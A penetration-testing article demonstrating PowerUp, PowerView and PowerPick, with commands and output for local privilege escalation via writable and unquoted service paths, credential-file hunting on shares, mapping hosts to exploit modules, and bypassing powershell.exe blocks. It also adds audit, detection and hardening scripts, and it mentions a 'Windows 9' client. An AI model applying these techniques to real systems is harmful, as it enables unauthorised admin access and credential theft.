Offensive PowerShell - Introduction to PowerTools

by Michael Schneider

PowerShell is a tool with many uses. In earlier Labs articles, I covered the basics of PowerShell in the context of penetration testing and tried to block PowerShell. Here, I show how PowerShell is used as an offensive tool, using PowerTools, which is part of the Veil-Framework project.

PowerUp: Local Attacks

PowerUp is a tool that supports local privilege escalation attacks against Microsoft Windows systems. It was developed by Will Schroeder alias @harmj0y. PowerUp consists of a single PS1 file that is loaded into a PowerShell session with Import-Module. The function Invoke-AllChecks inspects the system configuration and lists possible attack vectors. Running this function on a Windows 9 client in my test environment, I found two services that can be manipulated with normal user privileges.

PS C:\Tools\PowerUp> Invoke-AllChecks

[*] Running Invoke-AllChecks

[*] Checking if user is in a local group with administrative privileges...

[*] Checking for unquoted service paths...
[*] Use 'Write-UserAddServiceBinary' or 'Write-CMDServiceBinary' to abuse

[+] Unquoted service path: ProcessExplorerService - C:\Program Files\procexp.exe
[+] Unquoted service path: ProcessMonitorService - C:\Program Files\Sysinternals\Process Monitor\Procmon.exe

[*] Checking service executable permissions...
[*] Use 'Write-ServiceEXE -ServiceName SVC' or 'Write-ServiceEXECMD' to abuse

[+] Vulnerable service executable: ProcessExplorerService - C:\Program Files\procexp.exe
[+] Vulnerable service executable: ProcessMonitorService - C:\Program Files\Sysinternals\Process Monitor\Procmon.exe

[*] Checking service permissions...

[*] Checking for unattended install files...

[*] Checking %PATH% for potentially hijackable .dll locations...

[*] Checking for AlwaysInstallElevated registry key...

[*] Checking for Autologon credentials in registry...

[*] Checking for encrypted web.config strings...

[*] Checking for encrypted application pool and virtual directory passwords...

There are two possible attack vectors for each service. The service ProcessExplorerService grants regular local users write access to the file procexp.exe, so the file can be replaced with any other file. The PowerUp function Write-ServiceEXE creates a binary that, when run, adds a local user with local administrator privileges to the system; this binary is used to overwrite the service's file.

To be able to undo the change after the user has been created, the original file should be backed up. Write-ServiceEXE automatically creates a backup of the file it replaces.

Before the attack, an attacker should check whether the account in use has sufficient rights to create a copy of the file in the directory. If not, the file has to be backed up manually, both to remain as undetected as possible and to be able to restore the original once the file in the directory has been replaced.

In the following example the backup step fails: Move-Item reports that access is denied, yet procexp.exe is overwritten anyway. When the service is started again, the manipulated file is executed and the user scip_admin is created. The result: the attacker has a local administrator account at his disposal.

PS C:\Tools\PowerUp> Write-ServiceEXE -ServiceName ProcessExplorerService -UserName scip_admin
Move-Item : Access to the path is denied.
At C:\Tools\PowerUp\PowerUp.ps1:689 char:13
+             Move-Item $ServicePath $BackupPath
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\Program Files\procexp.exe:FileInfo) [Move-Item], UnauthorizedAccessException
    + FullyQualifiedErrorId : MoveFileInfoItemUnauthorizedAccessError,Microsoft.PowerShell.Commands.MoveItemCommand

[*] Binary for service 'ProcessExplorerService' to create user 'scip_admin : Password123!' written to 'C:\Program Files\procexp.exe'

When the service ProcessMonitorService was defined, the path to its executable was specified without quotation marks. The complete path is C:\Program Files\Sysinternals\Process Monitor\Procmon.exe. When starting the service, Windows tries to interpret the path up to each space as the executable. It therefore does not only look for Procmon.exe but also for the following files, if they exist:

To exploit this misconfiguration, an attacker needs write access to one of these directories. By default, unprivileged users cannot write to directories under C:\Program Files. In this example, however, the permissions on the subdirectory Sysinternals allow regular users to write files. Using the PowerUp function Write-UserAddServiceBinary, an attacker creates a binary that adds a new user. This file is copied into the directory Sysinternals under the name Process.exe. When the service is restarted, a new user named scip_admin2 is created. The result: the attacker has a local administrator account at his disposal.
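The two service weaknesses above, writable service binaries and unquoted paths, are easy to audit without PowerUp. The following script is an added example written for this article; it is not PowerUp code. It is read-only, runs with normal user rights, and assumes Windows PowerShell 3.0 or later (for Get-CimInstance) and service paths in the usual "C:\...\program.exe arguments" form. Get-UnquotedPathCandidates computes the intermediate files Windows would try for an unquoted path (for the Procmon service this yields C:\Program.exe and C:\Program Files\Sysinternals\Process.exe), and Test-WritableByLowPrivilege checks whether Everyone, Authenticated Users or BUILTIN\Users can create or write files at a given location.

```powershell
# Added example (not PowerUp code): audit services for writable executables and
# unquoted paths whose intermediate candidates sit in a low-privilege-writable directory.

function Get-ServiceExePath {
    # Strip quotes and arguments from a service PathName, returning the executable only.
    param([Parameter(Mandatory)][string]$PathName)
    if ($PathName.StartsWith('"')) { return $PathName.Split('"')[1] }
    $m = [regex]::Match($PathName, '^(.*?\.exe)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return ($PathName -split ' ')[0]
}

function Get-UnquotedPathCandidates {
    # For an unquoted path containing spaces, return the executables Windows will
    # try before the real one (path truncated at each space, with .exe appended).
    param([Parameter(Mandatory)][string]$PathName)
    if ($PathName.StartsWith('"')) { return @() }
    $exe = Get-ServiceExePath $PathName
    if ($exe -notmatch ' ') { return @() }
    $parts = $exe.Split(' ')
    $candidates = @()
    for ($i = 1; $i -lt $parts.Length; $i++) {
        $candidates += (($parts[0..($i - 1)] -join ' ') + '.exe')
    }
    return $candidates
}

function Test-WritableByLowPrivilege {
    # True if Everyone (S-1-1-0), Authenticated Users (S-1-5-11) or BUILTIN\Users
    # (S-1-5-32-545) hold an Allow ACE with "Create files / write data" on $Path.
    # Inherit-only ACEs are skipped because they grant nothing on the object itself.
    # Deny ACEs and generic rights are not evaluated, so treat a hit as a lead to verify.
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    $lowPrivSids = 'S-1-1-0', 'S-1-5-11', 'S-1-5-32-545'
    $writeData   = [System.Security.AccessControl.FileSystemRights]::WriteData
    $inheritOnly = [System.Security.AccessControl.PropagationFlags]::InheritOnly
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if (($ace.PropagationFlags -band $inheritOnly) -ne 0) { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }
        if ($lowPrivSids -notcontains $sid) { continue }
        if (($ace.FileSystemRights -band $writeData) -ne 0) { return $true }
    }
    return $false
}

function Invoke-ServiceAudit {
    # Walk every installed service and return one object per finding.
    $findings = @()
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        if (-not $svc.PathName) { continue }
        $exe = Get-ServiceExePath $svc.PathName
        if (Test-WritableByLowPrivilege $exe) {
            $findings += [pscustomobject]@{ Service = $svc.Name; Issue = 'Writable service executable'; Path = $exe }
        }
        foreach ($cand in Get-UnquotedPathCandidates $svc.PathName) {
            if (Test-WritableByLowPrivilege (Split-Path -Path $cand -Parent)) {
                $findings += [pscustomobject]@{ Service = $svc.Name; Issue = 'Unquoted path, writable directory'; Path = $cand }
            }
        }
    }
    return $findings
}

Invoke-ServiceAudit | Format-Table -AutoSize
```

Remediation for a hit is the same in both cases: quote the image path (for example `sc.exe config ProcessMonitorService binPath= "\"C:\Program Files\Sysinternals\Process Monitor\Procmon.exe\""`) and remove write access for Users and Authenticated Users from the service binary and its directories.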

PowerView: A Walk Through the Domain

PowerView, also developed by Will Schroeder, is a tool that uses Windows domain functions to gather information about a network and its users. All of the tool's functions send legitimate requests that can be executed with the rights of an ordinary domain user. Some functions, called MetaFunctions, originate from a tool named netview by security researcher Rob Fuller alias mubix. It takes little effort to find information about users, computers and shares.

PS C:\Tools\PowerView> Invoke-Netview
Running Netview with delay of 0
[+] Domain Controller: dc01.labs.scip.ch
[*] Total number of hosts: 2

[+] Server: dc01.labs.scip.ch
[+] IP: 192.168.78.100
[+] dc01.labs.scip.ch - Share: ADMIN$   : Remote Admin
[+] dc01.labs.scip.ch - Share: Backup$  :
[+] dc01.labs.scip.ch - Share: C$       : Default share
[+] dc01.labs.scip.ch - Share: Data     :
[+] dc01.labs.scip.ch - Share: IPC$     : Remote IPC
[+] dc01.labs.scip.ch - Share: NETLOGON         : Logon server share
[+] dc01.labs.scip.ch - Share: SYSVOL   : Logon server share
[+] dc01.labs.scip.ch - Share: Users    :

[+] Server: client02.labs.scip.ch
[+] IP: 192.168.78.135
[+] client02.labs.scip.ch - Logged-on - LABS\\sysop
[+] client02.labs.scip.ch - Logged-on - LABS\\sysop
[+] client02.labs.scip.ch - Logged-on - LABS\\sysop
[+] client02.labs.scip.ch - Logged-on - LABS\\sysop
[+] client02.labs.scip.ch - Logged-on - LABS\\jdoe
[+] client02.labs.scip.ch - Share: ADMIN$       : Remote Admin
[+] client02.labs.scip.ch - Share: C$   : Default share
[+] client02.labs.scip.ch - Share: IPC$         : Remote IPC

The command Invoke-ShareFinder crawls the network and lists shares per system. Hidden shares, whose names end in $ and which are not displayed in Windows Explorer's default view, appear in the list as well. Using Invoke-FileFinder, an attacker can search the listed shares for files. Called without additional parameters, it looks for files whose names contain the strings pass, sensitive, secret, admin, login or unattend*.xml. Additional strings and patterns can be supplied with -Terms. In the second example below, I search for ZIP files.

PS C:\Tools\PowerView> Invoke-FileFinder

FullName       : \\dc01.labs.scip.ch\Backup$\passwords.txt
Owner          : BUILTIN\Administrators
LastAccessTime : 02.07.2015 07:17:40
LastWriteTime  : 02.07.2015 07:18:06
Length         : 44

PS C:\Tools\PowerView> Invoke-FileFinder -Terms *.zip

FullName       : \\dc01.labs.scip.ch\Backup$\backup-01.zip
Owner          : BUILTIN\Administrators
LastAccessTime : 02.07.2015 07:17:13
LastWriteTime  : 02.07.2015 07:17:13
Length         : 0

FullName       : \\dc01.labs.scip.ch\Backup$\backup-02.zip
Owner          : BUILTIN\Administrators
LastAccessTime : 02.07.2015 07:17:25
LastWriteTime  : 02.07.2015 07:17:13
Length         : 0

FullName       : \\dc01.labs.scip.ch\Backup$\backup-03.zip
Owner          : BUILTIN\Administrators
LastAccessTime : 02.07.2015 07:17:32
LastWriteTime  : 02.07.2015 07:17:13
Length         : 0
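Because every request Invoke-ShareFinder and Invoke-FileFinder send is a legitimate SMB share access, the server-side trace is Security event 5140 ("A network share object was accessed"), logged when the File Share audit subcategory is enabled. The script below is an added example for this article, not PowerView code: it parses 5140 event XML by field name and flags any account that touches many distinct shares within a short window, which is how a share crawl looks from the file server. The events it runs on are constructed samples modelled on the share list above; the threshold and window are assumptions to tune per environment.

```powershell
# Added example (not PowerView code): detect share-enumeration sweeps from 5140 events.

function ConvertFrom-ShareAccessXml {
    # Turn one 5140 event (as XML text) into a flat record, selecting EventData by Name.
    param([Parameter(Mandatory)][string]$Xml)
    $doc = [xml]$Xml
    $data = @{}
    foreach ($d in $doc.Event.EventData.Data) { $data[$d.GetAttribute('Name')] = $d.InnerText }
    [pscustomobject]@{
        Time     = [datetime]$doc.Event.System.TimeCreated.SystemTime
        Account  = "$($data['SubjectDomainName'])\$($data['SubjectUserName'])"
        SourceIp = $data['IpAddress']
        Server   = $doc.Event.System.Computer       # the server that logged the event
        Share    = $data['ShareName']
    }
}

function Find-ShareSweeps {
    # Flag accounts that access at least $Threshold distinct (server, share) pairs
    # within any $WindowMinutes window. Returns one alert per account.
    param([object[]]$Events, [int]$WindowMinutes = 5, [int]$Threshold = 5)
    $alerts = @()
    foreach ($group in ($Events | Group-Object Account)) {
        $sorted = @($group.Group | Sort-Object Time)
        for ($i = 0; $i -lt $sorted.Count; $i++) {
            $end = $sorted[$i].Time.AddMinutes($WindowMinutes)
            $inWindow = @($sorted[$i..($sorted.Count - 1)] | Where-Object { $_.Time -le $end })
            $targets = @($inWindow | ForEach-Object { "$($_.Server)\$($_.Share)" } | Sort-Object -Unique)
            if ($targets.Count -ge $Threshold) {
                $alerts += [pscustomobject]@{
                    Account        = $group.Name
                    From           = $sorted[$i].Time
                    DistinctShares = $targets.Count
                    SourceIp       = (@($inWindow | Select-Object -ExpandProperty SourceIp | Sort-Object -Unique) -join ',')
                }
                break
            }
        }
    }
    return $alerts
}

# --- constructed sample events (not real log data) ---
function New-SampleShareEvent {
    param([string]$Time, [string]$User, [string]$Ip, [string]$Server, [string]$Share)
    $template = '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><EventID>5140</EventID><TimeCreated SystemTime="{0}"/><Computer>{3}</Computer></System><EventData><Data Name="SubjectUserName">{1}</Data><Data Name="SubjectDomainName">LABS</Data><Data Name="IpAddress">{2}</Data><Data Name="ShareName">\\*\{4}</Data></EventData></Event>'
    return $template -f $Time, $User, $Ip, $Server, $Share
}

$fmt = 'yyyy-MM-dd\THH:mm:ss\Z'
$sampleXml = @()
# A normal logon touches the two logon shares once.
$t0 = [datetime]'2015-07-02T07:10:13Z'
foreach ($s in 'NETLOGON', 'SYSVOL') {
    $sampleXml += New-SampleShareEvent -Time $t0.ToUniversalTime().ToString($fmt) -User 'sysop' -Ip '192.168.78.135' -Server 'dc01.labs.scip.ch' -Share $s
}
# A crawler walks every share on the domain controller within seconds.
$shares = 'ADMIN$', 'Backup$', 'C$', 'Data', 'IPC$', 'NETLOGON', 'SYSVOL', 'Users'
$t1 = [datetime]'2015-07-02T07:20:00Z'
for ($i = 0; $i -lt $shares.Count; $i++) {
    $sampleXml += New-SampleShareEvent -Time $t1.AddSeconds(2 * $i).ToUniversalTime().ToString($fmt) -User 'jdoe' -Ip '192.168.78.135' -Server 'dc01.labs.scip.ch' -Share $shares[$i]
}

$events = $sampleXml | ForEach-Object { ConvertFrom-ShareAccessXml $_ }
Find-ShareSweeps -Events $events | Format-Table -AutoSize

# Live use on a file server or domain controller with File Share auditing enabled:
# $events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 5140 } |
#     ForEach-Object { ConvertFrom-ShareAccessXml $_.ToXml() }
# Find-ShareSweeps -Events $events
```

Selecting EventData by the Name attribute rather than by positional index keeps the parser stable across Windows versions that add fields. The same record shape also works for event 5145 (detailed file share access) if that subcategory is enabled, which additionally records the relative path opened on the share.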

Every computer object in Active Directory records the operating system name, version and service pack of the machine. The function Get-ExploitableSystems reads this information and cross-references it with a list of publicly known exploits.

PS C:\Tools\PowerView> Get-ExploitableSystems

ComputerName    : dc01.labs.scip.ch
OperatingSystem : Windows Server 2008 R2 Standard
ServicePack     :
LastLogon       : 02.07.2015 07:10:13
MsfModule       : exploit/windows/smb/ms10_061_spoolss
CVE             : http://www.cvedetails.com/cve/2010-2729

ComputerName    : dc01.labs.scip.ch
OperatingSystem : Windows Server 2008 R2 Standard
ServicePack     :
LastLogon       : 02.07.2015 07:10:13
MsfModule       : exploit/windows/smb/ms10_061_spoolss
CVE             : http://www.cvedetails.com/cve/2010-2729

ComputerName    : dc01.labs.scip.ch
OperatingSystem : Windows Server 2008 R2 Standard
ServicePack     :
LastLogon       : 02.07.2015 07:10:13
MsfModule       : exploit/windows/smb/ms08_067_netapi
CVE             : http://www.cvedetails.com/cve/2008-4250

ComputerName    : dc01.labs.scip.ch
OperatingSystem : Windows Server 2008 R2 Standard
ServicePack     :
LastLogon       : 02.07.2015 07:10:13
MsfModule       : exploit/windows/smb/ms09_050_smb2_negotiate_func_index
CVE             : http://www.cvedetails.com/cve/2009-3103

PowerPick: Execute PowerShell Scripts Despite Blocks

The PowerPick project by pentester and red teamer Justin Warner alias @sixdub has one goal: use PowerShell features without powershell.exe. It is similar to PS2EXE, which I presented in A Story About Blocking PowerShell. While PS2EXE wraps a PS script in an executable file, SharpPick, the project's executable, runs arbitrary PS scripts from files, resources or URLs directly: the script is passed to SharpPick.exe as a parameter. If powershell.exe is blocked, PS scripts can therefore still be executed.

C:\Program Files\Sysinternals>SharpPick.exe -f C:\Tools\PowerUp\PowerUp.ps1
[*] Running Invoke-AllChecks

[*] Checking if user is in a local group with administrative privileges...

[*] Checking for unquoted service paths...
[*] Use 'Write-UserAddServiceBinary' or 'Write-CMDServiceBinary' to abuse

[+] Unquoted service path: ProcessExplorerService - C:\Program Files\procexp.exe
[+] Unquoted service path: ProcessMonitorService - C:\Program Files\Sysinternals\Process Monitor\Procmon.exe
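Blocking powershell.exe does not block the engine, but the engine's own logging keeps working regardless of which process hosts it. Module Logging events (ID 4103 in Microsoft-Windows-PowerShell/Operational) carry a "Host Application" line that names the executable that loaded System.Management.Automation, so a script run through SharpPick.exe is recorded under the SharpPick path instead of powershell.exe. The following detector is an added example for this article, not PowerPick code; it assumes Module Logging is enabled on the monitored host, and the two messages it runs on are constructed samples in the 4103 message layout.

```powershell
# Added example (not PowerPick code): flag PowerShell activity hosted by a process
# other than the standard PowerShell hosts, using the Context block of 4103 messages.

$ExpectedHosts = @(
    'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe',
    'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe',
    'C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe'
)

function Get-ContextField {
    # Read one "Name = value" line from the Context block of a 4103 message.
    param([Parameter(Mandatory)][string]$Message, [Parameter(Mandatory)][string]$Name)
    $m = [regex]::Match($Message, '(?m)^\s*' + [regex]::Escape($Name) + ' = (.*?)\s*$')
    if ($m.Success) { return $m.Groups[1].Value }
    return $null
}

function Find-UnexpectedPowerShellHosts {
    # Return one object per message whose host executable is not in $Allowed.
    param([string[]]$Messages, [string[]]$Allowed = $ExpectedHosts)
    $hits = @()
    foreach ($msg in $Messages) {
        $hostApp = Get-ContextField -Message $msg -Name 'Host Application'
        if (-not $hostApp) { continue }
        # The field carries the full command line; keep only the executable path
        # (paths with spaces are fine because we stop at the first ".exe").
        $exe = ([regex]::Match($hostApp, '^"?(.*?\.exe)', 'IgnoreCase')).Groups[1].Value
        if ($Allowed -contains $exe) { continue }        # -contains is case-insensitive
        $hits += [pscustomobject]@{
            HostExecutable = $exe
            User           = Get-ContextField -Message $msg -Name 'User'
            Command        = ($msg -split "`n")[0].Trim()
        }
    }
    return $hits
}

# --- constructed sample messages (not real log data) ---
$SampleMessages = @(
@'
CommandInvocation(Get-Process): "Get-Process"
Context:
        Severity = Informational
        Host Name = ConsoleHost
        Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile
        Engine Version = 5.1.14393.0
        User = LABS\sysop
'@,
@'
CommandInvocation(Invoke-AllChecks): "Invoke-AllChecks"
Context:
        Severity = Informational
        Host Name = Default Host
        Host Application = C:\Program Files\Sysinternals\SharpPick.exe -f C:\Tools\PowerUp\PowerUp.ps1
        Engine Version = 5.1.14393.0
        User = LABS\jdoe
'@
)

Find-UnexpectedPowerShellHosts -Messages $SampleMessages | Format-Table -AutoSize

# Live use on a host with Module Logging enabled:
# $msgs = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4103 } |
#     ForEach-Object { $_.Message }
# Find-UnexpectedPowerShellHosts -Messages $msgs
```

Script Block Logging (event 4104) is engine-level as well and captures the script text itself, so the content of PowerUp.ps1 would appear there even when it never touched powershell.exe. On PowerShell 5 with AppLocker script rules enforced, the engine additionally drops into Constrained Language Mode in every host, which removes most of what the tools in this article rely on.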

Countermeasures

There is no universal defence against the attacks described in this article. Defence against attacks like these begins with the configuration of the operating system and the network.

In addition to these measures, further control mechanisms such as application whitelisting are needed. If it is known which directories running programs are executed from, other directories such as the user profile should be configured so that executing files from them is not permitted. Also make sure that executables cannot be stored there. Starting with Windows Server 2008, Microsoft offers the File Screening feature, which defines which file types may be stored in shared folders. With it, storing executables on a share can be prevented.

File Screening in Windows
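The two controls just described can be expressed as configuration. The script below is an added example for this article, not from the original: it creates an active FSRM file screen that rejects executables written to a share, builds an AppLocker policy that allows execution only below Program Files and Windows (so a binary dropped into a user profile or a writable share is denied by default), and evaluates that policy against a known-good and a known-bad file before anything is enforced. It assumes Windows Server 2012 or later for the FileServerResourceManager and AppLocker PowerShell modules and an elevated session; the share path, policy file and rule GUIDs are placeholders.

```powershell
# Added example (not from the article): file screening plus an AppLocker allow-list.

Import-Module FileServerResourceManager   # requires the FS-Resource-Manager feature
Import-Module AppLocker

$SharePath  = 'D:\Shares\Data'                         # placeholder: local path of the share
$PolicyFile = Join-Path $env:TEMP 'exe-allowlist.xml'  # placeholder

# 1. File screening: an active screen rejects writes of files matching the built-in
#    "Executable Files" group. Matching is by file name pattern, not content, so a
#    renamed binary still gets through; this control limits storage, not execution.
if (Test-Path -LiteralPath $SharePath) {
    if (-not (Get-FsrmFileScreen -Path $SharePath -ErrorAction SilentlyContinue)) {
        New-FsrmFileScreen -Path $SharePath -IncludeGroup 'Executable Files' -Active `
            -Description 'Block storage of executables on the Data share'
    }
}

# 2. AppLocker: allow-list by location. Everyone may run what lives under
#    %PROGRAMFILES% (both Program Files trees) and %WINDIR%; administrators may run
#    anything. User-writable folders below %WINDIR% are denied explicitly, because
#    deny rules take precedence over allow rules. Rule Ids are placeholder GUIDs.
$policyXml = @'
<AppLockerPolicy Version="1">
  <RuleCollection Type="Exe" EnforcementMode="Enabled">
    <FilePathRule Id="00000000-0000-0000-0000-000000000001" Name="Allow Program Files" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%PROGRAMFILES%\*" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="00000000-0000-0000-0000-000000000002" Name="Allow Windows" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%WINDIR%\*" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="00000000-0000-0000-0000-000000000003" Name="Deny Windows Temp" Description="" UserOrGroupSid="S-1-1-0" Action="Deny">
      <Conditions><FilePathCondition Path="%WINDIR%\Temp\*" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="00000000-0000-0000-0000-000000000004" Name="Deny Windows Tasks" Description="" UserOrGroupSid="S-1-1-0" Action="Deny">
      <Conditions><FilePathCondition Path="%WINDIR%\Tasks\*" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="00000000-0000-0000-0000-000000000005" Name="Allow Administrators" Description="" UserOrGroupSid="S-1-5-32-544" Action="Allow">
      <Conditions><FilePathCondition Path="*" /></Conditions>
    </FilePathRule>
  </RuleCollection>
</AppLockerPolicy>
'@
Set-Content -LiteralPath $PolicyFile -Value $policyXml -Encoding UTF8

# 3. Evaluate the policy before deploying it. A copy of notepad.exe in the user's
#    temp folder stands in for a dropped binary; it should be denied by default while
#    the original under %WINDIR% is allowed by the "Allow Windows" rule.
$probe = Join-Path $env:TEMP 'probe-notepad.exe'
Copy-Item -LiteralPath "$env:WINDIR\System32\notepad.exe" -Destination $probe -Force
Test-AppLockerPolicy -XmlPolicy $PolicyFile -User Everyone -Path "$env:WINDIR\System32\notepad.exe", $probe |
    Select-Object FilePath, PolicyDecision, MatchingRule | Format-Table -AutoSize
Remove-Item -LiteralPath $probe

# To enforce on the local machine (the Application Identity service must be running):
# Set-AppLockerPolicy -XmlPolicy $PolicyFile
```

Test-AppLockerPolicy is the safety net here: run it over an inventory of the executables users actually need before switching the rule collection to enforced, and keep the collection in audit mode (EnforcementMode="AuditOnly") until the 8003 events in the AppLocker log stop showing legitimate software.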

Using a combination of control mechanisms, the attacks I’ve outlined in this article can be mitigated and the attack surface of a local system as well as the internal network can be significantly reduced.

About the Author

Michael Schneider

Michael Schneider has been in IT since 2000. Since 2010 he has focused on information security. He is an expert in penetration testing, hardening and the detection of vulnerabilities in operating systems. He is well known for a variety of tools written in PowerShell to find, exploit and mitigate weaknesses. (ORCID 0000-0003-0772-9761)
